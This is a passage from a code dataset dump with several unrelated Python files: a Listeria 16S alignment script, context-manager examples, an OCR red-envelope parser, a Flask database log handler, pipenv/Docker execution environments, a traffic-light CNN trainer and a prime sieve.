steady_withing_genus_but_not_distinguished\n\t\t\n\t\t\t\n\t\t\t\t\ndef addResultAsCount(other_db):\n\tglobal result_line_count\n\tglobal result_file\n\t\n\t#CALCULATING RESULTS\n\tsame_as_listeria_count=0\n\tdifferent_from_listeria_count=0\n\tfor line in other_db:\n\t\tif line[index_char] == listeria_base:\n\t\t\tsame_as_listeria_count+=1\n\t\telse:\n\t\t\tdifferent_from_listeria_count+=1\n\t\t\t\n\t# PRINTING THE RESULTS TO RESULT STRING\n\t# result_file.write( same_as_listeria_count )\t\t#for debugging\n\tresult_line_count += str(same_as_listeria_count)+\"\\t\"\n\t\t\t\ndef steadyWithinGenus(other_db):\n\tglobal result_line_bool\n\tglobal result_line_count\n\n\t#if the position is consistent within the genus and not . : going over all of the other genuses:\n\tif listeria_base != \".\" :\t\t\n\t\taddResultAsBoolian(other_db)\n\t\taddResultAsCount(other_db)\n\telse:\n\t\t# result_file.write( \".\" )\n\t\tresult_line_bool += \".\"\n\t\tresult_line_count += \".\\t\"\n\t\t\n\ndef NotSteadyWithinGenus():\n\tglobal result_line_bool\n\tglobal result_line_count\n\t\n\tresult_line_bool += not_steady_position_within_genus\n\tresult_line_count += not_steady_position_within_genus + \"\\t\"\n\n\ndef printingInfo():\n\t#IN BOOL\n\tresult_file.write( \"BOOL RESULTS:\\n\" )\n\tresult_file.write( \"positions that are not steady within the genus itself are symbolized by : \" + not_steady_position_within_genus + \"\\n\" )\n\tresult_file.write( \"conserved positions are symbolised by : \" + steady_withing_genus_and_distinguised + \"\\n\" )\n\tresult_file.write( \"positions that are steady eithin genus but not distinguished are symbolised by : \" + steady_withing_genus_but_not_distinguished + \"\\n\" )\n\tresult_file.write( \"dots stands for lack of base in that alignment\\n\" )\n\tresult_file.write( result_line_bool + \"\\n\" )\n\n\t\t\n\t\t\t\n\t#IN COUNT\n\tresult_file.write( \"COUNT RESULTS\\n\" )\n\tresult_file.write( \"The numbers symbols the num of species that has the same base in that position \\n\" )\n\tresult_file.write( \"positions that are not steady within the genus itself are symbolized by : \" + not_steady_position_within_genus + \"\\n\" )\n\tresult_file.write( \"dots stands for lack of base in that alignment\\n\" )\n\tresult_file.write( result_line_count )\n\t\n\t\n\t\n#\t****\t#\n#\tmain\t#\n#\t****\t#\n\nresult_file = open(r\"/cygdrive/s/HOME/Microbes/16sScriptsAfterAlignment/PerGenus/result__listeria3\", \"w\")\n\t\n# result_file = open(r\"/cygdrive/s/HOME/Microbs/16sScriptsAfterAlignment/PerGenus/result_listeria\", \"w\")\n\n\n\n\n\nlisteria_db = open(r\"aligned_listeria_strends_only\", \"r\").read().splitlines()\t\t#the aligned lines of listeria as a list of strings- every string is a line\nother_db= open(r\"aligned_all_but_listeria_strends_only3\", \"r\").read().splitlines()\t#the aligned lines of all but listeria as a list of strings- every string is a line\n# other_db= open(r\"aligned_all_but_listeria_strends_only\", \"r\").read().splitlines()\t#the aligned lines of all but listeria as a list of strings- every string is a line\n\n# count=0\n# for line in other_db:\n\t# count+=1\n\t# if len(line) != 7682:\n\t\t# print \"count \" + str(count) + \" len \" + str(len(line))\n\t\t\n\nfor index_char in range(0, len(listeria_db[0])):\t\t\n\tcheckingIfSteadyWithinGenus(listeria_db)\n\n\tif position_steady_within_listeria:\n\t\tsteadyWithinGenus(other_db)\n\telse:\n\t\tNotSteadyWithinGenus()\n\nprintingInfo()\n\nresult_file.close()\n\t","sub_path":"PerGenus/script_to_find_match.py","file_name":"script_to_find_match.py","file_ext":"py","file_size_in_byte":4373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"91993848","text":"import os\nimport sys\nfrom contextlib import redirect_stdout, suppress, contextmanager\n\n\n################################################\n\n@contextmanager\ndef tag(name):\n print(\"<%s>\" % name)\n yield\n print(\"\" % name)\n\n\nwith tag(\"div\"):\n print(\"yay!\")\n\n\n\n#############################################################\n\n# we want to direct all the print statements to the log file\n#first try:\nwith open('log.txt', 'w') as log:\n oldstdout = sys.stdout\n sys.stdout = log\n try:\n print(\"here is the help for sys:\")\n help(sys)\n finally:\n sys.stdout = oldstdout\n\n# better:\nwith open('log.txt', 'w') as log:\n with redirect_stdout(log):\n print(\"here is the help for sys:\")\n help(sys)\n\n\n\n\n####################################################3\n\n\nwith suppress(FileNotFoundError):\n os.remove(\"foo\")\n\n\n\n","sub_path":"idiomatic/context-managers.py","file_name":"context-managers.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"382699723","text":"#!/usr/bin/python3\n# -*- coding:utf-8 -*-\n\nimport os\nimport re\nimport copy\nimport threading\nimport logging\nfrom decimal import Decimal\nfrom Images.bao.hongbao import HongBao\nfrom Images.bao.tools import get_continuous_same_list\nfrom Images.bao import yutu\n\nlogger = logging.getLogger(__name__)\n\n\nclass Images(object):\n def __init__(self, images_dir):\n self.images_dir = images_dir\n self.images_name = os.listdir(images_dir)\n # {'image_name1': [bao1, bao2], 'image_name2': [bao2, bao3], }\n self.hongbaos = {}\n # [bao1, bao2, bao3, bao4, bao2]\n self.hongbao_list = []\n # [\n # {\"images_names\": ['1.jpg', '2.jpg'], \"baos\":[]},\n # {\"images_names\": ['1.jpg', '2.jpg'], \"baos\":[]},\n # ]\n self.outdate_baos = []\n self.similar_image = []\n self.threads = []\n self.total = 0.0\n self.same_total = 0.0\n\n self.get_honbaos_from_images()\n self.get_same_image()\n self.calculate()\n\n @staticmethod\n def find_price(words):\n matches = re.findall(u\"-\\d+\\.{1,2}\\d{2}|\\+\\d+\\.{1,2}\\d{2}|\\d+\\.{1,2}\\d{2}元|-\\d+\\.{1,2}\\d{2}元\", words)\n if matches:\n return matches.pop()\n else:\n return None\n\n @staticmethod\n def float_words(words):\n matches = re.findall(u\"-\\d+\\.{1,2}\\d{2}\", words)\n if matches:\n return matches.pop()\n else:\n matches = re.findall(u\"\\d+\\.{1,2}\\d{2}\", words)\n if matches:\n return matches.pop()\n return None\n\n @staticmethod\n def find_date(words):\n matches = re.findall(u\"\\d{1,2}月\\d{1,2}日\\d{1,2}:\\d{1,2}|\\d{1,2}-\\d{1,2}\", words)\n if matches:\n return matches.pop()\n else:\n return None\n\n def get_hongbaos_from_one_image(self, image_name):\n image_path = os.path.join(self.images_dir, image_name)\n words_list = yutu.get_words_from_image(image_path)\n\n baos_in_image = []\n outdate_baos = []\n\n for index in range(len(words_list)):\n if self.find_price(words_list[index]):\n value = self.float_words(words_list[index])\n split_str = words_list[index].split(value)\n\n if split_str[0] != '' and split_str[0] != u'+':\n username = split_str[0]\n else:\n username = words_list[index-1]\n if username == u'拼':\n username = words_list[index-2]\n try:\n if self.find_date(words_list[index+1]):\n date = words_list[index+1]\n elif self.find_date(words_list[index+2]):\n date = words_list[index+2]\n else:\n date = None\n except IndexError:\n date = None\n hongbao = HongBao(username,\n Decimal(value.replace('..', '.')),\n date)\n\n if hongbao.value < 0:\n outdate_baos.append(hongbao)\n break\n else:\n baos_in_image.append(hongbao)\n if outdate_baos:\n self.outdate_baos.append({'image_name': image_name,\n 'baos': outdate_baos,\n 'sum':sum(bao.value for bao in outdate_baos)})\n\n self.hongbaos[image_name] = baos_in_image\n\n def get_honbaos_from_images(self):\n for image_name in self.images_name:\n th = threading.Thread(target=self.get_hongbaos_from_one_image,\n args=(image_name,))\n self.threads.append(th)\n\n for t in self.threads:\n t.start()\n\n for t in self.threads:\n t.join()\n\n self.threads = []\n\n for image_name, hongbaos in self.hongbaos.items():\n self.hongbao_list += hongbaos\n logging.info(image_name, sum([hongbao.value for hongbao in hongbaos]))\n\n def calculate(self):\n self.total = sum([bao.value for bao in self.hongbao_list])\n\n def get_same_image(self):\n for image_name, hongbaos in self.hongbaos.items():\n image_bao_copy = self.hongbaos.copy()\n image_bao_copy.pop(image_name)\n\n for copy_image_name, copy_baos in image_bao_copy.items():\n same_lists = get_continuous_same_list(hongbaos, copy_baos)\n if same_lists:\n sum_same_list = sum(item.value for item in same_lists)\n same_image = {\"images_names\": {image_name,\n copy_image_name},\n \"baos\": same_lists,\n \"sum\": sum_same_list}\n\n if self.similar_image:\n if same_lists in [similar['baos'] for similar in self.similar_image]:\n copy_similars = copy.deepcopy(self.similar_image)\n for index, similar in enumerate(copy_similars):\n if similar['baos'] == same_image['baos']:\n self.similar_image[index]['images_names'].update(same_image['images_names'])\n else:\n self.similar_image.append(same_image)\n else:\n self.similar_image.append(same_image)\n\n @property\n def similar_images_name(self):\n return [image['images_names'] for image in self.similar_image]\n\n","sub_path":"Images/bao/images_manager.py","file_name":"images_manager.py","file_ext":"py","file_size_in_byte":5634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"438168128","text":"import logging\nimport time\nimport datetime\n\nfrom flask.logging import default_handler\n\nfrom tensai.models import db, Log\n\n\nclass TensaiLogger(logging.Handler):\n\n def __init__(self, level=logging.WARN):\n super().__init__(level)\n\n def emit(self, record):\n self.format(record)\n log = Log()\n struct_time = time.localtime(record.created)\n log.time_created = datetime.datetime(*struct_time[:6])\n log.level = record.levelname\n log.module = record.module\n log.funcname = record.funcName\n log.message = record.message\n log.stack = record.stack_info\n\n db.session.add(log)\n db.session.commit()\n\n\ndef register_loggers(app):\n if app.debug:\n app.logger.addHandler(logging.StreamHandler())\n app.logger.addHandler(TensaiLogger())\n app.logger.removeHandler(default_handler)\n","sub_path":"server/tensai/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"266156862","text":"# -*- coding: utf-8 -*-\n\"\"\"exenv: module defining the execution environment object\n\nDefines a python and a docker execution environment\n\nTODO: allow a way to register 3rd party execution environments\n\"\"\"\nimport abc, re, os\n\nclass Exenv(abc.ABC):\n \"\"\"Exenv object\n defining common interface for exenvs\n the inheriting Exenv needs to define an class attribute `_uid_regex`,\n which should be a compiled regular expression with named groups.\n At the very least define a group \"typenv\" identifying the Exenv and \n a group \"uid\" that within the Exenv should fully define it.\n\n Args:\n uid (str): The string that uniquely identifies the execution environment.\n reco (Reconto): the research compendium that depends on this environment.\n \"\"\"\n def __init__(self,uid,reco):\n regex_attributes = self._uid_regex.fullmatch(uid).groupdict()\n for key in regex_attributes:\n setattr(self, key, regex_attributes[key])\n self.reco = reco\n \n @abc.abstractmethod\n def load_environment(self):\n pass\n\n @abc.abstractmethod\n def execute_command(self, command, *args):\n pass\n\n @abc.abstractmethod\n def stop_environment(self):\n pass\n\n @property\n @abc.abstractmethod\n def env_working_dir(self):\n pass\n\n def get_env_filepath(self,filepath):\n \"\"\"get an absolute filepath for set environment\n\n Args:\n filepath (str): should be a relative reco path\n for a data or result file/dir\n \"\"\"\n return os.path.join(self.env_working_dir,filepath)\n\n def get_env_data_filepath(self,filepath):\n \"\"\"get an absolute data filepath for set environment\n\n Args:\n filepath (str): should be a relative reco path\n for a data file/dir\n \"\"\"\n return os.path.join(self.env_working_dir,'data',filepath)\n\n def get_env_result_filepath(self,filepath):\n \"\"\"get an absolute result filepath for set environment\n\n Args:\n filepath (str): should be a relative reco path\n for a result file/dir\n \"\"\"\n return os.path.join(self.env_working_dir,'results',filepath)\n\n def reset_escaped_annotations(self, command):\n \"\"\"Reset the escaped annotations\n\n A command list can contain reco escaped bash symbols as elements,\n this function replaces them with their bash symbol.\n\n Args:\n command (str[]): a command list\n \"\"\"\n return [\n e if not e in self.reco.annotations['special']\n else self.reco.annotations['special'][e]\n for e in command\n ]\n\n def contains_escaped_annotations(self, command):\n \"\"\"Return if there are any escaped annotations\n\n Args:\n command (str[]): a command list\n \"\"\"\n for e in command:\n if e in self.reco.annotations['special']:\n return True\n #if this statement is reached no special annotations present\n return False\n \n def __enter__(self):\n self.load_environment()\n return self\n \n def __exit__(self, exc_type, exc_value, traceback):\n self.stop_environment()\n\n @staticmethod\n def get_env(uid,reco):\n if uid.startswith('pyenv'): return Pyenv(uid,reco)\n elif uid.startswith('docker'): return Docker(uid,reco)\n else: raise NotImplementedError('in future should allow registering 3rd party env')\n\nclass Pyenv(Exenv):\n \"\"\"Python execution environment\"\"\"\n _uid_regex = re.compile(r'(?Ppyenv)://(?Ppy\\d\\.\\d)/(?P\\w\\S+)')\n\n @property\n def env_working_dir(self):\n return self.reco.path\n \n def load_environment(self):\n import plumbum as pb\n self.envdir = os.path.join(self.reco.path,'exenv',self.pyver,self.uid)\n if not os.path.exists(self.envdir):\n if not os.path.exists(os.path.join(self.reco.path,'exenv')):\n os.mkdir(os.path.join(self.reco.path,'exenv'))\n if not os.path.exists(os.path.join(self.reco.path,'exenv',self.pyver)):\n os.mkdir(os.path.join(self.reco.path,'exenv',self.pyver))\n os.mkdir(self.envdir)\n with pb.local.env(PIPENV_IGNORE_VIRTUALENVS=1):\n with pb.local.cwd(self.envdir):\n pb.local['pipenv']('--python','python'+self.pyver[2:])\n\n def execute_command(self, command, *args):\n import plumbum as pb\n if type(command) is str:\n command = (command,)\n with pb.local.env(PIPENV_IGNORE_VIRTUALENVS=1):\n with pb.local.cwd(self.envdir):\n pb.local['pipenv'].bound_command(\n 'run',*command,*args\n ) & pb.FG\n\n def stop_environment(self):\n del self.envdir\n \nclass Docker(Exenv):\n \"\"\"Docker container execution environment\"\"\"\n _uid_regex = re.compile(r'(?Pdocker)://(?P\\w\\S+)')\n\n @property\n def env_working_dir(self):\n return '/app'\n \n def load_environment(self):\n import docker\n self.client = docker.from_env()\n\n def execute_command(self, command, *args):\n from docker.errors import ImageNotFound\n if args and type(command) is str:\n command += ' '+' '.join(args)\n elif type(command) is not str:\n escape_command = self.contains_escaped_annotations(command)\n if escape_command: command = self.reset_escaped_annotations(command)\n command = ' '.join(command) + ' ' + ' '.join(args)\n command = 'sh -c \"{}\"'.format(command.replace('\"',r'\\\"'))\n try:\n self.image = self.client.images.get(self.uid)\n except ImageNotFound:\n self.image = self.client.images.pull(self.uid)\n self.container = self.client.containers.create(\n self.uid, command,\n volumes={\n os.path.join(self.reco.path,'data'):{'bind':'/app/data','mode':'ro'},\n os.path.join(self.reco.path,'results'):{'bind':'/app/results','mode':'rw'},\n },\n working_dir = '/app'\n )\n self.container.start()\n\n def stop_environment(self):\n self.container.stop()\n del self.client, self.image, self.container\n","sub_path":"reconto/exenv.py","file_name":"exenv.py","file_ext":"py","file_size_in_byte":6280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"462471401","text":"import numpy as np\nimport os\nimport cv2\nfrom sklearn.model_selection import train_test_split\n\ndef get_files(dir_path):\n return [f for f in os.listdir(dir_path) if os.path.isfile(os.path.join(dir_path, f))]\n\ndataset_samples = []\ndataset_labels = []\n\ndef read_dataset_dir(dir_path, label, dataset_samples, dataset_labels):\n for filename in get_files(dir_path):\n image = cv2.cvtColor(cv2.imread(os.path.join(dir_path, filename)), cv2.COLOR_BGR2RGB)\n image = cv2.resize(image, (24, 72))\n dataset_samples.append(image)\n dataset_labels.append(label)\n\nred_samples, red_labels = [], []\nread_dataset_dir('dataset/red', 0, red_samples, red_labels)\nread_dataset_dir('dataset/red', 0, red_samples, red_labels)\n\nyellow_samples, yellow_labels = [], []\nread_dataset_dir('dataset/simulator/yellow', 1, yellow_samples, yellow_labels)\nread_dataset_dir('dataset/udacity-sdc/yellow', 1, yellow_samples, yellow_labels)\n\ngreen_samples, green_labels = [], []\nread_dataset_dir('dataset/udacity-sdc/green', 2, green_samples, green_labels)\nread_dataset_dir('dataset/simulator/green', 2, green_samples, green_labels)\n\nred_samples = np.array(red_samples)\nred_labels = np.array(red_labels)\n\nX_red_train, X_red_test, y_red_train, y_red_test = train_test_split(\n red_samples,\n red_labels,\n test_size=0.05,\n random_state=42\n)\n\nX_yellow_train, X_yellow_test, y_yellow_train, y_yellow_test = train_test_split(\n yellow_samples,\n yellow_labels,\n test_size=0.05,\n random_state=42\n)\n\nX_green_train, X_green_test, y_green_train, y_green_test = train_test_split(\n green_samples,\n green_labels,\n test_size=0.05,\n random_state=42\n)\n\nX_train = np.concatenate([X_red_train, X_yellow_train, X_green_train], axis=0)\ny_train = np.concatenate([y_red_train, y_yellow_train, y_green_train], axis=0)\n\nX_test = np.concatenate([X_red_test, X_yellow_test, X_green_test], axis=0)\ny_test = np.concatenate([y_red_test, y_yellow_test, y_green_test], axis=0)\n# Number of training examples\nn_train = X_train.shape [0]\n\n# Number of testing examples.\nn_test = X_test.shape [0]\n\n# What's the shape of an traffic sign image?\nimage_shape = X_train.shape [1:3]\n\n# TODO: How many unique classes/labels there are in the dataset.\nn_classes = 3\n\nprint(\"Number of training examples =\", n_train)\nprint(\"Number of testing examples =\", n_test)\nprint(\"Image data shape =\", image_shape)\nprint(\"Number of classes =\", n_classes)\n\ntrain_memory_amount = n_train * (image_shape[0] * image_shape[1] * 3 + n_classes) / 1024 / 1024\ntest_memory_amount = n_test * (image_shape[0] * image_shape[1] * 3 + n_classes) / 1024 / 1024\nall_memory_amount = train_memory_amount + test_memory_amount\nprint(\"Train memory amount (Mb) =\", train_memory_amount)\nprint(\"Test memory amount (Mb) =\", test_memory_amount)\nprint(\"All memory amount (Mb) =\", all_memory_amount)\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.axes_grid1 import ImageGrid\n\ntrain_classes_sizes = [np.count_nonzero(y_train==i) for i in range (n_classes)] \ntest_classes_sizes = [np.count_nonzero(y_test==i) for i in range (n_classes)] \n\ndef show_images_in_grid (images, rows, cols):\n fig = plt.figure (figsize=(5., 10.))\n grid = ImageGrid(fig, 111,\n nrows_ncols=(rows, cols),\n axes_pad=0.1\n )\n for i in range(len (images)):\n grid[i].imshow(images [i])\n\n plt.show()\n\n#table of traffic sign examples for diffetent classes\nim_pos = 0\nX_train_examples = []\n# num_of_examples = 10\nfor i in range(n_classes):\n X_train_examples.append (X_train [im_pos])\n im_pos += train_classes_sizes [i]\n\nshow_images_in_grid (X_train_examples, 1, n_classes)\n\n#counts of examples in each classes\nplt.figure ()\nplt_x = range (n_classes)\ntrain_classes_sizes = [np.count_nonzero(y_train==i) for i in range (n_classes)] \ntest_classes_sizes = [np.count_nonzero(y_test==i) for i in range (n_classes)] \nplt.bar (plt_x, train_classes_sizes, color=(0.2588,0.4433,1.0))\nplt.bar (plt_x, test_classes_sizes, color=(1.0,0.5,0.62))\nplt.xlabel ('Traffic lights id')\nplt.ylabel ('Count')\nplt.title ('Traffic lights counts in each class train and test dataset')\nplt.show ()\nX_train_preprocessed = np.divide(X_train, 255).astype (np.float32);\nX_test_preprocessed = np.divide(X_test, 255).astype (np.float32);\n\n#dividing into train and validation dataset\n\ndef shuffle_dataset (dataset_x, dataset_y):\n assert len (dataset_x) == len (dataset_y)\n p = np.random.permutation(len(dataset_x))\n return dataset_x [p], dataset_y [p]\n\ndef split_into_train_and_validation_dataset (dataset_x, dataset_y, train_proportion):\n train_samples_by_classes = []\n train_labels_by_classes = []\n X_train_samples = np.zeros ((0, image_shape[0], image_shape[1], 3))\n y_train_samples = np.zeros ((0,))\n X_validation_samples = np.zeros ((0, image_shape[0], image_shape[1], 3))\n y_validation_samples = np.zeros ((0,))\n sample_index = 0\n for class_size in train_classes_sizes:\n train_samples_count = int(train_proportion * class_size)\n\n #getting and shuffle one class samples\n dataset_x_for_class = dataset_x[sample_index:sample_index + class_size]\n dataset_y_for_class = dataset_y[sample_index:sample_index + class_size]\n dataset_x_for_class, dataset_y_for_class = shuffle_dataset (dataset_x_for_class, dataset_y_for_class)\n \n #splitting to train and validation dataset\n X_train_for_class = dataset_x_for_class[0:train_samples_count]\n y_train_for_class = dataset_y_for_class[0:train_samples_count]\n X_valid_for_class = dataset_x_for_class[train_samples_count:class_size]\n y_valid_for_class = dataset_y_for_class[train_samples_count:class_size]\n \n #storing train samples by classes\n #this will be used later to generate augmented dataset\n train_samples_by_classes.append (X_train_for_class)\n train_labels_by_classes.append (y_train_for_class)\n \n #storing samples in corresponding datasets\n X_train_samples = np.concatenate((X_train_samples, X_train_for_class), axis=0)\n y_train_samples = np.concatenate((y_train_samples, y_train_for_class), axis=0)\n X_validation_samples = np.concatenate((X_validation_samples, X_valid_for_class), axis=0)\n y_validation_samples = np.concatenate((y_validation_samples, y_valid_for_class), axis=0)\n \n sample_index += class_size\n \n return X_train_samples, y_train_samples, X_validation_samples, y_validation_samples, train_samples_by_classes, train_labels_by_classes\n\nX_train_for_learning, \\\ny_train_for_learning, \\\nX_valid_for_learning, \\\ny_valid_for_learning, \\\nsamples_by_classes, \\\nlabels_by_classes = split_into_train_and_validation_dataset (X_train_preprocessed, y_train, 0.8)\n\n\nimport random as rand\nimport cv2 \n\n# generate @generate_count images from given @images\ndef augment_images (images, generate_count):\n images_last_index = len (images) - 1\n augmented = []\n for i in range (generate_count):\n im1 = images [rand.randint (0, images_last_index)]\n \n #rotation and scaling\n Mrot = cv2.getRotationMatrix2D((16,16),rand.uniform(-5.0, 5.0), rand.uniform(0.95, 1.05))\n\n #affine transform and shifts\n pts1 = np.float32([[0,0],[image_shape[1],0],[image_shape[1], image_shape[0]]])\n a = 5;\n shift = 8\n shiftx = rand.randint (-shift, shift);\n shifty = rand.randint (-shift, shift);\n pts2 = np.float32([[\n 0 + rand.randint (-a, a) + shiftx,\n 0 + rand.randint (-a, a) + shifty\n ],[\n image_shape[1] + rand.randint (-a, a) + shiftx,\n 0 + rand.randint (-a, a) + shifty\n ],[\n image_shape[1] + rand.randint (-a, a) + shiftx,\n image_shape[0] + rand.randint (-a, a) + shifty\n ]])\n M = cv2.getAffineTransform(pts1,pts2)\n (h, w) = im1.shape[:2]\n\n augmented_image = cv2.warpAffine(\n cv2.warpAffine (\n im1\n , Mrot, (w, h)\n )\n , M, (w,h)\n )\n \n augmented_image += rand.uniform(-0.2, 0.2)\n np.clip(augmented_image, 0.0, 1.0, out=augmented_image)\n \n augmented.append (augmented_image)\n \n return augmented\n\n\nX_train_augmented = np.zeros ((0, image_shape[0], image_shape[1], 3))\ny_train_augmented = np.zeros ((0,))\n\n#generate images up to 3000 images for each class\n#augmented dataset will contain only generated images\naugment_limit = 3000\ndef augment_dataset ():\n global X_train_augmented\n global y_train_augmented\n X_train_augmented = np.zeros ((0, image_shape[0], image_shape[1], 3))\n y_train_augmented = np.zeros ((0,))\n \n for augmenting_index in range(n_classes):\n samples = samples_by_classes [augmenting_index]\n labels = labels_by_classes [augmenting_index]\n\n augment_count = augment_limit\n new_samples = augment_images (samples, augment_count)\n y_train_augmented = np.concatenate((y_train_augmented, [augmenting_index for i in range (augment_count)]), axis=0)\n\n X_train_augmented = np.concatenate((X_train_augmented, new_samples), axis=0)\n \nimport tensorflow as tf\ntf.reset_default_graph()\n\nbatch_size = 128\n\nimport math\n# I taken it from my solution to lab quiz\ndef batches(batch_size, features, labels):\n \"\"\"\n Create batches of features and labels\n :param batch_size: The batch size\n :param features: List of features\n :param labels: List of labels\n :return: Batches of (Features, Labels)\n \"\"\"\n assert len(features) == len(labels)\n batches_arr = []\n num_full_batches = math.floor(len(features) / batch_size)\n num_full_batches_samples = num_full_batches * batch_size\n sample_index = 0\n while (sample_index < num_full_batches_samples):\n batches_arr.append ([features[sample_index:sample_index+batch_size], labels[sample_index:sample_index+batch_size]])\n sample_index += batch_size\n \n if (num_full_batches_samples != len(features)):\n left_samples = len(features) - num_full_batches_samples\n batches_arr.append ([features[-left_samples:], labels[-left_samples:]])\n \n return batches_arr\n\n#flat last convolution layer to use it in MLP network\ndef flatten (batch):\n flatten_size = np.prod(batch.get_shape().as_list()[1:])\n return tf.reshape(batch, [-1, flatten_size]), flatten_size\n\n#generate CNN based on parameters\ndef gen_model(cnn_input, cnn_weights, cnn_strides, cnn_nonlinearities, cnn_maxpooling, mlp_layers, mlp_nonlinearities):\n\n cnn_layer_input = cnn_input\n cnn_outputs = []\n for W, s, n, p in zip(cnn_weights, cnn_strides, cnn_nonlinearities, cnn_maxpooling):\n\n W_var = tf.Variable (tf.truncated_normal(W, stddev=0.01))\n cnn_layer_input = tf.nn.conv2d (cnn_layer_input, W_var, strides=s, padding='SAME')\n\n b_var = tf.Variable(tf.zeros(W[3]))\n cnn_layer_input = tf.nn.bias_add(cnn_layer_input, b_var)\n\n cnn_layer_input = n (cnn_layer_input)\n\n cnn_layer_input = tf.nn.max_pool(cnn_layer_input, ksize=[1, p[0], p[1], 1], strides=[1, p[0], p[1], 1], padding='SAME')\n cnn_outputs.append (cnn_layer_input)\n\n cnn_output_flatten_pre, cnn_output_flatten_pre_size = flatten (cnn_outputs[-2])\n cnn_output_flatten, cnn_output_flatten_size = flatten (cnn_layer_input)\n #print last and previous conv layers flatten sizes, just for information\n print (\"cnn pre: \", cnn_output_flatten_pre_size)\n print (\"cnn: \", cnn_output_flatten_size)\n \n mlp_input = tf.concat ([cnn_output_flatten_pre, cnn_output_flatten], 1)\n mlp_input_size = cnn_output_flatten_pre_size + cnn_output_flatten_size\n \n mlp_layers.insert(0, mlp_input_size)\n for i in range(len(mlp_layers)-1):\n W_var = tf.Variable (tf.truncated_normal([mlp_layers[i], mlp_layers[i+1]], stddev=0.01))\n b_var = tf.Variable(tf.zeros(mlp_layers[i+1]))\n mlp_input = mlp_nonlinearities [i] (tf.matmul (mlp_input, W_var) + b_var)\n\n return mlp_input\n\n#parameters of the CNN\ncnn_input = tf.placeholder (tf.float32, shape=(None, image_shape[0], image_shape[1], 3), name='input_image')\ncnn_layers = [[5, 5, 3, 16], [5, 5, 16, 32], [5, 5, 32, 32], [5, 5, 32, 32]] #conv size x, conv size y, in channels, out channels\ncnn_strides = [[1, 1, 1, 1], [1, 1, 1, 1], [1, 1, 1, 1], [1, 1, 1, 1]] #1, stride x, stride y, 1\ncnn_pooling = [[2, 2], [2, 2], [2, 2], [2, 2]]\ncnn_nonlinearities = [tf.nn.relu, tf.nn.relu, tf.nn.relu, tf.nn.relu]\n\n#parameters of MLP\nmlp_layers = [256, n_classes]\nmlp_nonlinearities = [tf.nn.tanh, tf.identity]\n\nmodel = gen_model (cnn_input, cnn_layers, cnn_strides, cnn_nonlinearities, cnn_pooling, mlp_layers, mlp_nonlinearities)\nmodel = tf.identity(model, name='model_output')\n\ny_correct = tf.placeholder (tf.int32, shape=(None,))\nY_batch_onehot = tf.one_hot (y_correct, n_classes)\n\nloss_op = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=model, labels=Y_batch_onehot))\nopt = tf.train.AdamOptimizer(learning_rate=0.0005)\ntrain_op = opt.minimize(loss_op)\ncorrect_prediction = tf.equal(tf.argmax(model, 1), tf.argmax(Y_batch_onehot, 1))\naccuracy_op = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\nepochs = 10\n\n#test given dataset with model\ndef test_dataset (dataset_x, dataset_y):\n test_loss = 0\n test_acc = 0\n test_num_batches = 0\n for X_batch, Y_batch in batches (batch_size, dataset_x, dataset_y):\n loss_val_test, acc_val_test = sess.run ([loss_op, accuracy_op], feed_dict={cnn_input: X_batch, y_correct: Y_batch})\n test_loss += loss_val_test\n test_acc += acc_val_test\n test_num_batches += 1\n\n test_loss /= test_num_batches\n test_acc /= test_num_batches\n return test_loss, test_acc\n\nsaver = tf.train.Saver ()\n\nwith tf.Session () as sess:\n sess.run (tf.global_variables_initializer())\n \n for i in range (epochs):\n \n #generate and shuffling new training samples for each epoch \n augment_dataset ()\n train_dataset_x, train_dataset_y = shuffle_dataset (X_train_augmented, y_train_augmented)\n\n #train only on generated samples\n for X_batch, Y_batch in batches (batch_size, train_dataset_x, train_dataset_y):\n loss_val, acc_val, _ = sess.run ([loss_op, accuracy_op, train_op], feed_dict={cnn_input: X_batch, y_correct: Y_batch})\n \n\n train_loss, train_acc = test_dataset (X_train_for_learning, y_train_for_learning)\n valid_loss, valid_acc = test_dataset (X_valid_for_learning, y_valid_for_learning)\n \n print (i,\" train loss: \", train_loss, \" acc: \", train_acc, \" valid loss: \", valid_loss, \" acc: \", valid_acc)\n\n #testing against test.p\n test_loss, test_acc = test_dataset (X_test_preprocessed, y_test)\n print (\"test loss: \", test_loss, \" acc: \", test_acc)\n \n saver.save (sess, 'tf-saves/cnn.ckpt')\n","sub_path":"test_functions.py","file_name":"test_functions.py","file_ext":"py","file_size_in_byte":14977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"255590235","text":"#siv #primearry\r\nimport array\r\nN = 100000002\r\n#prime = array.array('i',[1]*N)\r\nprime = [1]*N\r\n\r\n#print(prime[10000000-1])\r\nprimelist = []\r\n\r\n\r\n#siv\r\n\r\ndef siv(n):\r\n\tcnt = 0\r\n\tprime[0] = 0\r\n\tprime[1] = 0\r\n\t#primelist.append(2)\r\n\t#for i in range(4,n+1,2):\r\n\t\r\n\t#\tprime[i] = 0\r\n\tfor i in range(3, n+1, 2):\r\n\t\tif i*i > n:\r\n\t\t\tbreak\r\n\r\n\t\tif prime[i] == 1:\r\n\t\t\t#primelist.append(i)\r\n\t\t\t#cnt += 1\r\n\t\t\tfor j in range(i*i, n+1, 2*i):\r\n\t\t\t\tprime[j] = 0\r\n\t\r\n\r\ndef printprime(n):\r\n\tcnt = 0\r\n\tj = 0\r\n\ti = 3\r\n\tprimelist.append(2)\r\n\twhile i < n+1:\r\n\r\n\t\tif j > 5000001 :\r\n\t\t\tbreak\r\n\r\n\t\tif prime[i] == 1:\r\n\t\t\tprimelist.append(i)\r\n\t\t\tj +=1\r\n\t\t\t\r\n\t\tcnt += 1\r\n\t\ti += 